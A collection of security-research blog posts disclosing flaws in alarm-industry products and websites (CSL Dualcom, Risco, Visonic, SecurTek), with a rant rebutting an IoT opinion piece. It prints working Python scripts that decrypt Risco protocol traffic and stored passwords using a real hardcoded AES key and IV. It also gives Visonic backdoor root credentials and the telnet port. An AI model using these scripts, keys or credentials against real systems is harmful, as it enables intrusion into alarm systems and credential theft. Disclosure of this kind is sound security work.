CSL Dualcom installer shop not protected by TLS

CSL Dualcom operate an installer shop which is used to order Dualcom units. This handles personal information, including a username and password.

The site is not protected by TLS at all. Credentials and any other data will be sent in the plain over the Internet.

This is not acceptable in 2015.

This was reported to CSL in June 2014.


As of 14/11/2015, the site now uses TLS and is configured correctly. Why was this not done before? Why did it take exposing it on a blog to happen?

CSL Dualcom Gemini Cisco VPN endpoint vulnerable to POODLE attack

CSL Dualcom use Cisco VPN software to connect to their management platform, Gemini.

The server that does this is listed as https://cslvpn.cslconnect.com/

On inspection with SSLLabs test, there are configuration issues with the TLS on this server, giving it a grade F.

This includes vulnerability to the POODLE attack.

This was fixed a long time ago by Cisco.

Note that, as per the SSLLabs test, this is not the only issue.


As of 14/11/2015, the POODLE vulnerability has been closed. Again, you need to ask why this wasn’t picked up.


Customer database leak on CSL Dualcom’s SIM registration portal

CSL Dualcom sell SIMs for M2M purposes. They need to be registered on their website.

This website is http://m2mconnect.csldual.com/SignUp – firstly note how this does not have TLS. This is not excusable in 2015.

On browsing the site, it was noted that the search string was limited to be 3 or more characters using client-side Javascript.

Using the site with Javascript turned off allowed a zero-length search to be submitted. Initially this appeared to cause the request to freeze. However, on waiting ~10 minutes, it became apparent that an empty search had returned every single record from the database – several megabytes of data.

All the companies

Through the UI this just appeared to be company name, town and postcode. However, inspection of the traffic showed that a massive JSON structure had been downloaded, including a company ID, “UniqueCode”, email address and often mobile number.

{“InstallerCompanyID”:”327398f6-431b-4495-8193-96789ecbe2bd”,”CompanyName”:”Minster Alarms”,”ContactName”:”Minster Alarms”,”PostCode”:”YO32 9NQ”,”Town”:”York”,”UniqueCode”:134265,”Accreditation”:”NSI”,”AddressOne”:”Suncliffe House”,”AddressTwo”:”New Lane, Huntington”,”County”:””,”Country”:”UK”,”CountryId”:0,”CurrencyId”:0,”Email”:”info@minsteralarms.co.uk“,”Mobile”:“”}

On clicking the company name, a list of users was returned, including personal email addresses, phone numbers and usernames:


These issues were reported to CSL Dualcom on 1st May. The issues were acknowledged on the 3rd May and fixed on the 4th by limiting the fields available.

During the leak, over 5700 companies details were available. It was confirmed that some of these had never registered SIMs, so it is likely the full CSL customer database.

6 months on, the registration site is still using HTTP.


Vulnerability in Risco Lightsys protocol encryption

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

This software communicates with alarm panels, sometimes over IP, sometimes over a mobile network. One of these panels is the Lightsys panel, which seems fairly common in the UK.

The encryption used by this protocol is token at best, and not suitable for securing communication across an untrusted network.

The protocol generates a psuedo-random sequence of numbers using a basic function. This is then XORed with the message to encrypt or decrypt.

Each panel has a “seed” that changes the encryption slightly. Because we have a partially known plaintext, you don’t need to know the seed to decrypt messages – it can just be determined. The seed tended to be the same across many panels.

numTable = [2, 4, 16, 32768]
PRNG_output = []

# This is the "Remote ID code" in the software
seed = 2

for i in range(0,255):
    bit = 0

    for j in range(0, 4):
        if (seed & numTable[j]) > 0:
            bit ^= 1

    seed = seed << 1 | bit
    PRNG_output.append(seed & 255)

# This has been captured from the network by tricking software into encrypting
# Message is 02RMT=1234 8EBC
# 02 is sequence number
# RMT is a command
# 1234 is the access code
msg = '353945620a804bc6dbe4b67ac0495503'.decode('hex')

plain = ''

for i in range(0, len(msg)):
    plain += chr(ord(msg[i]) ^ PRNG_output[i])

print "Decrypted message: %s" % plain

A further proof of concept was developed that can send and receive commands with alarms, leading to a denial-of-service condition. I am not disclosing this as it can cause harm and is not the root cause of the problem.

This was reported to Risco on 7th August. As of yet, they have not indicated if they wish to fix this issue.


  • Don’t roll your own encryption
  • If you have a key, make sure it has enough length to actually improve security

Open Risco support portal including private FTP credentials

During a routine pen-test of an alarm receiving centre, I was googling for default usernames and passwords of Risco software and alarms.

When doing this, I found an abandoned support portal “Riscopedia” which contained a number of valid credentials for FTP sites, along with other private documentation.


Whilst the Technical.Notes account appears to be shut down, there are still paths onto other FTP servers that look like they should be closed.

This was reported to Risco on 30th July via Twitter and email.


Backdoor root account on Visonic Powerlink 2 modules

During a routine pen-test of an alarm receiving centre, a repository of manufacturer firmware was found. This is often quite hard to get hold of, and I welcomed the opportunity to reverse some of these.

The Visonic Powerlink 2 firmware stood out due to it’s large size – this was almost certainly an embedded Linux system.

On unpacking the firmware, it was found that the units had an enabled account with root privileges called root2 with the password visonic. I discovered this by cracking the password file. However, once I had done this, someone pointed out that this was widely documented as early as 2011.

The system runs telnet on port 7523, and a web interface on port 80. Shodan has ~85 of these visible at the moment.

Once you have root access, you can arm and disarm the connected alarm, and capture images from any connected cameras.

In addition to this, for the firmware and single unit I was permitted access to, it was found it was transmitting status messages (armed/disarmed status, serial number) over a plaintext connection to http://myhome.visonic.com/ ( We could not find anywhere in the firmware to turn this off.

They would be an ideal pivot or persistance node in a longer term pen-test.




Vulnerability in password storage in Risco Configuration Software

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

The software is backed by a SQL database called “ConfigurationSoftware” which contains a table called ut_Users with a column called PWD which stores passwords for users that can log into the system.

This PWD field appeared to be a base64 encoded string.

On further investigation, this password was stored in an encrypted form. This allows it to be recovered from the software, and doesn’t follow best practices of hashing passwords.

The encryption is AES-256 and uses a fixed key and IV which is hardcoded into the application.

Passwords were recovered from the database which, due to password re-use, allowed me to take control of the domain controller and website of the company. The password was of good complexity, so if hashing had been used, I would have been unlikely to have recovered this.

A Python script to decrypt the passwords is shown below.

from Crypto.Cipher import AES
from Crypto import Random
import base64

BS = 32
# PKCS #7
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]

def encrypt(raw, key, iv ):
    raw = pad(raw)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return (cipher.encrypt(raw ))

def decrypt(enc, key, iv ):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(enc))

# Static and hardcoded
key = 'FKLe608FDsF5J6ZaKpTghjED7Hb80ALq'
iv = 'Sckt6DopykVCD9Lq'

# The default 123 password as installed
ciphertext = 'BQqwo4a87TvfJKv4af8h3g=='

print 'Password is %s' % decrypt(base64.b64decode(ciphertext), key, iv).decode('utf-16-le')

This was reported to Risco on 7th August. A fix is meant to be deployed at the beginning of November.


  • Hash, don’t encrypt your passwords.
  • Don’t hardcode encryption keys in your software
  • Don’t use the same password for domain admin as in a system of unknown quality
  • Have a security contact so it’s not painful to report issues

Terrible website security on www.apprentices4fs.com

Companies in the physical security world often seem to have awful virtual security.

This site – “Apprentices for Fire & Security” – is a prime example of absolutely awful virtual security. And once again, these are not subtle issues – they are indicative of incompetent developers working on the security aspects of a website. Stop entrusting your security to people who do not know what they are doing.

Let us go through the obvious issues:

No HTTPS anywhere

The site handles passwords, emails, addresses, names, CVs, job postings. This is confidential information.

None of this is protected by HTTPS. It is all sent in the plain.

This is not forgiveable in 2015. It is embarrassing that anyone can deploy a site handling logins and CVs without it.

Update: as of mid-morning 9/11, HTTPS has been turned on for apprentices4fs.com and some other domains. You have to ask, why was this not done in the first place?

Passwords are emailed to users

When you setup your account, you chose a password. This password is immediately emailed to you.

This means that your password has now been sent in the plain across the Internet.

This is not good practice for very obvious reasons.

Passwords are stored in the plain

When you fill in the password reminder, your original password is emailed to you. This means the passwords are not hashed.

This means that if the database was to leak, it would reveal all the passwords.

This is terrible practice and it is widely known that it is terrible practice.

Passwords are truncated

Enter a 100 character password, and send a password reminder. The plain text password is now only 20 characters long.

This is a side effect of plain text password storage. If you store the password in the plain, you have to limit the password length to something. If you hash the password, the password could be “War & Peace” and the hash would still be of a fixed length.

This is terrible practice.

Passwords are not case sensitive

If you set your password to AAAAAA, you can login to the system with aaaaaa.

Even if you are using plain text storage, you don’t need to do this.

This massively reduces the number of different passwords available.

This is terrible practice.

Detailed error logging is turned on

If an error occurs, you are given a detailed error log.

This leaks information such as the directory structure, what attack mitigation rules are in place and so on. Sometimes these error logs can even leak things like usernames and passwords.

They should be turned off on a production server. This is web admin 101.

Open redirect on login form

Often when you access a page that requires authentication, a site will pass a referrer (i.e. the page you were on) to to the login page. This is so you are seamlessly returned to the page you wanted to access, after logging in.

It’s absolutely vital that this referrer URL is not a free choice.

Why? Picture this attack.

The attacker sends this URL to the victim:


The victim logs in to the real site, and are redirected to the attacker’s fake login page. This fake page says that the victim has entered their password incorrectly.

The victim logs in again. His credentials are stored by the attacker, and he is returned to the genuine site.

This is a glaringly obvious issue and very serious.

No protection against cross-site request forgery

There is no evidence of any protection against cross-site request forgery (CSRF). This includes pages used to change passwords and other details.

Cross-site request forgery means I can send a crafted link to a user (e.g. by email), and if they click on the link, the action will be carried out as the user.

A very simple example would be something like:


And the logged in user would have their password changed to ABCDEF.

The actual mechanics are more complex than this. Regardless, you cannot deploy a public facing website dealing with logins or confidential information without CSRF protection.

Cookies don’t have HTTPOnly flag set.

Cookies are used to remember that you are logged into a site using something called a session token. If you get hold of someone else’s session token, you can act as if you were logged in as them.

A common attack is to steal a cookie by making the browser run malicious Javascript (exploiting a vulnerability called XSS) that sends the cookie to an attacker.

The HTTPOnly flag prevents Javascript from reading the cookie. It makes stealing the cookie much harder. Above all, nearly all of the time, there is no penalty to setting it. It has no downsides

Again, this is basic stuff.

An arsehole security warning

Do anything they don’t like, and you get this. (which has since been made 403).

There’s a strong correlation, in my experience, between OTT warnings like this and incompetence.

Overzealous XXS filters

It’s vital you protect your site from an attack called XSS, where an attacker tries to inject their own JavaScript into your pages.

There are a number of ways of doing this. You can detect basic attempts and warn a user that there is an issue, probably logging the issue and alerting admins. If there is persistent and realistic threat, start banning IPs.

Immediately locking the IP out and issuing them with a ridiculous warning it not how to do XSS protection.

Visit the search page and search for <script>. Or just click here to do it for you. Be warned you will be banned from the site.

This has since been hidden, but someone had kindly screenshotted it:


In my experience of looking at over 100 sites, the ones that react to XSS like this tend to have wholly ineffective XSS filters – they only deal with the very obvious, and can be subverted. It’s like putting up a “Warning – Guard Dogs” sign, without the guard dogs.

Totally ineffective banning

If you trigger the overzealous XSS filters, you are banned. Or so it says.

That is, unless you use another browser. Or just manually change the user agent.

I suspect they have done this because otherwise you could easily perform a denial-of-service attack by blocking from many IPs.

This banning is token at best, and provides no extra security.

No security contact

Well, no contact at all. What do you have to do to get these people to respond to a security issue?


The security of this site is about as bad as it can get without just leaving everything in the open. There has been little to no regard to the security of the data or users. This is to the level that it is either extreme incompetence or negligence.

What is more worrying is that the people who developed this sell it as a product.

And, of course, who is behind this particular site? CSL Dualcom.


99 other sites running software by the same company.


Forwarding Jobs – Freight and Logistic Jobs



Home | Dove Partnership















CRA Consulting | Legal & Financial Recruitment Agency | Sheffield



Home Page


KBB recruitment


They have 99 problems, but their HTTPS configuration isn’t one, because they don’t use it.

Why you shouldn’t listen to Pat Burns on LinkedIn

An article entitled “Why The Internet of Things and the Cloud Should Break Up” showed up on Reddit and Twitter earlier this week. It sounded promising – I’m a proponent of decoupling IoT systems so that they don’t rely on the cloud, even if they still use the cloud most of the time. What I was greeted with was a terrible opinion piece, full of misinformation.

I don’t know where to start, it’s so bad.

A FitBit wristband connects via Bluetooth with your smartphone but sends your activity data to a FitBit cloud app. Does your personal health data really need to sit in the cloud or can you extract sufficient value from it by simply keeping the data stored locally on your smartphone?

This isn’t the IoT. That’s a Bluetooth device connecting to a phone. He seems to be one of these people who will call anything connected and not a full blown machine “IoT”.

For most of the IT industry — let’s just get this on the table — the cloud today is the hammer and there’s almost nothing that isn’t a nail. And the cloud is an easy place to build an IoT application and operates without the messy hassles of embedded software, endpoint security, FCC regulations, or fertility risks, to name a few.

Firstly, using the cloud generally means adding functionality to endpoints. Take a standard IP camera, accepting connections on port 80, using port-forwarding for remote access. Add cloud functionality to allow remote streaming and the system takes more time to develop. It is not a freebie.

Secondly, using the cloud normally makes endpoint security much less of an issue. Traditional architectures, such as port-forwarding to devices, or customers running their own infrastructure, involve inbound connections to your network and endpoints. Many cloud connected devices have absolutely no ports open at all – SmartThings v2 hub for example. Because of this, endpoint security becomes a lot less difficult.

Thirdly, regardless of your architecture, if you want to use wireless connectivity, you need to deal with RF. I don’t see how the cloud avoids this.

It’s cheap and everywhere. Like beer in your dorm, the cloud today is so popular and so well-capitalized that infecting the IoT was only a matter of when, not if. Spin-offs like cloud analytics or cloud perimeter security (no laughing!) are simply too affordable and too visible to pass up. Traditional enterprise IoT pilots that used to cost $250,000 in enterprise software and systems integration services can be executed at a fraction of this price now due to the cloud.

Developing cloud systems and operating robust, secure cloud systems is a cost and complexity. People are not doing it to avoid cost.

Tools. Compared to older desktop-based tools, cloud-based environments and API’s are vastly simpler to use and integrate while offering robust functionality.

He seems to be conflating using a cloud-based development environment with operating in the cloud. Nearly all cloud based solutions need significant development in traditional languages, on a desktop. It’s not point and click.

Weak endpoints and edges. Endpoints that don’t do analytics, support real-time queries, or even support full two-way messaging tend to spew data remorselessly to an edge router and/or the cloud. Bluetooth, ZigBee, 6lowPAN, and others are all guilty as charged and as a result, they end up driving their users to the cloud.

He seems to have a bee in his bonnet about how “stealthy” wireless protocols are. There really is no link between the wireless protocol used and how much data ends up getting sent to the cloud. They are different layers – one a transport protocol, the other application. Zigbee does send a fair amount of beacon traffic, but none of this ends up outside the PAN. If your app sends a lot of traffic over Zigbee and then your gateway sends it to the cloud, that is not the fault of Zigbee.

It’s not secure. This one is hard to overstate as crummy IoT security is the sordid “yeah, but” in so many discussions about the IoT. IDC predictsthat nearly every IT network will have an IoT security breach by the end of 2016 and IT departments are in full freakout mode now. Endpoint security is comically bad and compounded with a hacker-friendly cloud, what could go wrong?

There is absolutely nothing inherent in the cloud architecture that makes it insecure. In fact, there can be a lot of advantages:

  • Endpoints no longer need to accept any incoming connections
  • Endpoints and gateways accept no user-input, massively simplifying design of secure interfaces
  • Connecting to a central point facilitates use of IDS, a skilled operations team, and regular centralised updates

Equally, there is nothing inherent in a cloud architecture that means the endpoints are insecure. An insecure endpoint will be insecure regardless of the architecture.

It’s not real-time. IoT apps that require real-time responses can’t tolerate the extra seconds or minutes required for a cloud lookup.

and later:

Waiting 2–3minutes for a cloud app to make time for you is a non-starter.

This is just pure misinformation. Going over the Internet adds latency. It doesn’t add “2-3 minutes”, it adds milliseconds typically. 2-3 minutes means the system has been designed badly, and this would be an issue regardless of where it operates.

It may not be faithful. The integrity of your data in the cloud is only as good as the people and systems hosting it. Sensors in your manufacturing facility in Taipei showing you running at 50% below your normal run rate or showing a supply chain hiccup? Hedge funds and competitors enjoy learning about this kind thing!

The integrity of your data on your self-hosted platform is only as good as the people and systems hosting it. Again, nothing inherent about cloud. I would rather have a skilled operations team managing intrusion detection, performance monitoring and disaster recovery than burden a sysadmin with yet another system in-house.

Getting out may be easier than getting in. Once you’ve married a cloud service, how easy will it be to disengage/migrate to another solution at some future date? Is standardization and interoperability in a state that will increase the risk of vendor lock-in? What if the cloud vendor is bought by your competitor and changes policies?

Which is equally true of any bought-in platform. Just remove the word “cloud” from the above paragraph. Vendor lock-in is real however.

A new golden rule of IoT network design is to store sensor data as close as possible to its point of origin and limit its sharing across the network unless absolutely necessary.

You can’t just invent golden rules. Many people want low-cost, low-power endpoints with no storage and no persistence, pushing everything to more powerful gateways or servers. The AWS and Azure IoT platforms both accommodate for this. This is Pat Burn’s golden rule, to sell his product.

The endpoint is key to the golden rule. Better processors, cheaper memory, and better networking stacks from companies like Haystack are evolving endpoints from dumb terminals to independent, distributed computing devices with real-time query (think Google for the IoT) and NoSQL-like filesystem support. Endpoint-centric designs also have the bonus of being more stealthy and secure, faster, cheaper, and better stewards of battery life and wireless bandwidth. In short, good IoT network design should begin with the endpoint in mind and “dumb” endpoint technologies that beacon or create unnecessary security risks should be phased out

I just don’t know where to begin on this.

The enemy of security is complexity. Are you actually trying to argue that having hundreds of endpoints in a distributed network, able to store data and be queried, are going to be more secure than, say, a memory-based RFID tag? Or a transmit-only 8-bit PIC based humidity sensor?

How are these endpoints cheaper?

What is his issue with beacons and stealth? Well – it’s lucky there is another article – “A Simple Proposal To Improve Security for the Internet of Things” to help us demolish yet another series of misconceptions and misinformation.

Almost every IoT security breach in recent news can be traced to the poor architecture of the wireless protocol used by the device.

No, no they can’t.

Firstly, that is very, very specific. “Poor architecture of the wireless protocol”. Not “Weak implementation of the wireless protocol” or “devices using wireless protocols”.

Secondly, neither of the links provided are breaches. A breach is the result of a system being exploited. One is information leakage, the other is a report of a vulnerability.

Thirdly, the Jeep hack was nothing to do with the wireless protocol. Jeeps could be using wired Ethernet and the same issues would have been present.

Fourthly, nearly every IoT breach in recent news has been carried out over the Internet. Not local attacks to the wireless protocol. There is a lot of research into wireless security, and there are a lot of noise at conferences, but the bulk of issues occur over the Internet remotely. Hackers are not sat outside homes and business cracking your Zigbee or wireless burglar alarm.

Avoiding or minimizing the chances of unauthorized discovery is not technically difficult. But today’s IoT technologies like Bluetooth, 6lowpan, Sigfox, LoRaWAN, and others make unauthorized discovery very easy and it creates the worst kind of angst in IT departments.

Most of the protocols make discovery easy because it is intentional. They layer security with discoverability, enabling systems which people can actually use and are actually deployed (unlike Dash7).

The link doesn’t support that unauthorised discovery is causing angst in IT departments. He seems to often do this – provide a link which is vaguely related but doesn’t support the argument. It would be fair to say “IoT is causing angst in IT departments”.

Most wireless IoT technologies were originally conceived as ways to stream large files (Bluetooth, WiFi) while some were designed to be “lighter” versions of WiFi (e.g., ZigBee). Today they are being re-positioned as “IoT” technologies and security, to put it nicely, is an afterthought. Oh yes — some have tried to “layer on” security and may profess to support encryption

Layering encryption onto a transport protocol is completely valid. It’s widely acknowledge that ZigBee, Z-Wave and WiFi, if implemented correctly, are secure from the risk profile that is involved. Skilled hackers are not sat outside your house, waiting for you to pair you Hue bulbs to the hub and grab the keys. It is not happening. Even if they did, all they can do is turn your lights on and off.

I have no idea why they “profess” to support encryption. They all offer encryption. WPA2 is actually a very secure protocol.

hacks for all of these technologies are quite public yet fundamentally traceable to one original sin:

these wireless IoT technologies don’t know how to keep quiet.

What? What hacks of wireless protocols can be traced to not keeping quiet?

More recently, drones are being used to hunt for ZigBee-based endpoints, giving bad actors an easy way to discover, map, and hack ZigBee endpoints:

No, drones are being used to map Zigbee broadcast traffic. This is not enabling anyone to hack Zigbee anymore than putting your house number on the door of your house enables someone to pick your locks.

this type of hack provides all sorts of information about each endpoint, including manufacturer ID.

This is not a hack.

This need to be “discoverable” — and this is not limited to ZigBee, Bluetooth or WiFi but to most wireless IoT technologies — requires a near-constant advertising of a device’s presence, leading to any number of “disaster scenarios” that others have extensively written about.

The link, again, doesn’t support that a wireless protocol being discoverable will lead to any disaster scenario. Just pile the links on and hope no one checks.

There is no technical reason that the Internet of Things cannot embrace silence, or stealth as I prefer to call it, as a first principle of endpoint security. Stealth is not a silver bullet for IoT security (there is no silver bullet) and stealth alone won’t protect a network from intrusions, but dollar-for-dollar, stealth is the simplest, cheapest, and most effective form of IoT security protection available.

There is, quite literally, nothing to support this position.

A endpoint, receiving and sending plaintext, unauthenticated commands and data, will not see a noticeable improvement in security. Passive monitoring of the channel will still leak data, and active tampering will cause havoc. The stealth must be broken for the device to send, and this can be seen.

An endpoint, receiving and sending encrypted, authenticated commands and data, will not see a noticeable improvement in security. The data is still encrypted. Unauthenticated commands won’t be carried out.

This is just garbage.

Dollar for dollar, it might be worth making your nodes quieter, but not at the cost of switching from a widely adopted, widely inspected wireless standard to Dash7.

He tries to explain why:

Cloaking. It is harder to discover, hack, spoof, and/or “stalk” an endpoint if a hacker cannot locate the endpoint.

Endpoints need to send. Being stealthy can reduce the traffic but there will still be traffic. Stealth is only a weak layer of security through obscurity.

Googling the IoT. Stealth enables real-time queries of endpoints, a la Google search that non-stealthy endpoints can’t support. Stealth also enables fast queries (<2 seconds) in environments with thousands of endpoints, in turn enabling big data analytics at the true edge of the network.

This has absolutely nothing to do with how stealthy communications are from the node. If you enable your node to be queried, it can be queried. In fact, querying and accessing data from the edge of a network almost negates attempts at being stealthy as you will see an increase in complex and important traffic of the wireless network.

Minimize interference. Less data being transmitted minimizes the opportunities for interference and failed message transmissions. Contrast this with the tragedy of the commons at 2.45 GHz, where WiFi, ZigBee, microwave ovens, and other countless other technologies engage in wireless gladiatorial combat and cause too many customers to return their IoT gadgets because they “don’t work”.

Again, this has very little to do with stealth. 434MHz – that Dash7 uses – has as many issues with contention as 2.4Ghz. In the UK, there are many more poor quality, untested, non-standards compliant transmitters in the 434MHz band than there are on 2.4Ghz.

Access control. Stealthy endpoints make it easier to control access to the endpoint by limiting who can query the endpoint.

Again, absolutely no link between stealth and access control. If you limit access to something, you limit access to it.

Storage. Less data being transmitted reduces storage costs. Storage vendors, on the other hand, love the non-stealthy IoT status quo.

Again, what? If your endpoint decides to ditch data, then your cloud can also decide to ditch data. This has nothing to do with stealth of the wireless protocol – it’s about volume of data at the application layer.

At this point, I’m bored of this. These articles are utter crap.




InSecurTek Monitoring


The director of IT from Securtek got in touch via the contact form. They are working to fix these issues, and his response was measured and reasonable, especially in light of my rather inflammatory blog post.

Thank you for bringing this to our attention.  We will be taking steps immediately to correct this situation, both in the short-term and in the long-term.
– Bryan Watson, Director of IT, SecurTek Monitoring Solutions


Another security industry website, another slew of basic mistakes.

SecurTek are a Canadian company who offer alarm monitoring. Even just a cursory glance at their system shows that they are ignoring basic security principles.


The login page is lacking HTTPS. There is no excuse for this in 2015 for a commercial web service of any form.



Username enumeration

The login form responds different depending on if the user exists or not.

Username not found

Username not found

This might seem minor, but it massively facilitates brute-forcing usernames and passwords by removing one of the unknowns. Best practice is to indicate that you have entered an incorrect username or password.

Passwords are stored in the plain

The forgotten password functionality simply emails you the password you have already set.

Password in the plain

Password in the plain

This has several implications.

It means that your password is stored in a way in which it can be retreived. Whilst it may be encrypted, this encryption can be reversed, yielding a password. This is not good and nowhere near best practice. Passwords should be hashed at the bare minimum, which prevents them being recovered in this way.

Email is not a secure way of delivering a password. There is the potential for many people to see this password. With password re-use being common, obtaining the password for SecurTek could yield access to many other systems. A password reset mechanism should use a random token and be time-limited.


This is a 2-minute glance at security, and it’s shown two very serious issues and one reasonably serious. They aren’t subtle issues.

Would you trust a company with your alarm monitoring if they can’t do these things right?